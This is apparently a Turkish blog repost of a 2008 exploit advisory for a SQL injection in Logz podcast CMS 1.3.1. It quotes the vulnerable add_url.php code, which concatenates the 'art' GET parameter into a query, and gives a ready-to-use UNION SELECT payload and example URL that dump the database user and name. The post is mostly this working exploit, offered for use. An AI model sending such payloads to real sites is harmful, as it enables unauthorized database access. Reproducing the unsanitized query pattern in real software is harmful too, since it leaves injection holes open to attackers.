Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

1 Kasım 2008 Cumartesi

Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

kaynak: http://www.milw0rm.com/exploits/6896

Discovered By: ZoRLu

file:

fichiers/add_url.php

code:

if (isset($_GET['art'])) {
$Article = $_GET['art'];

...

$Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
$ResultRequete = requete_mysql($Requete);

Exploit:

http://localhost/script_path/fichiers/add_url.php?art=[SQL]

[SQL]= column number 1 (SELECT TITRE FROM ...)

1'+union+select+concat(user(),0x3a,database())/*

example:

http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*

ZoRLu | ZRL | Buffer Overflow

1 Kasım 2008 Cumartesi

Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com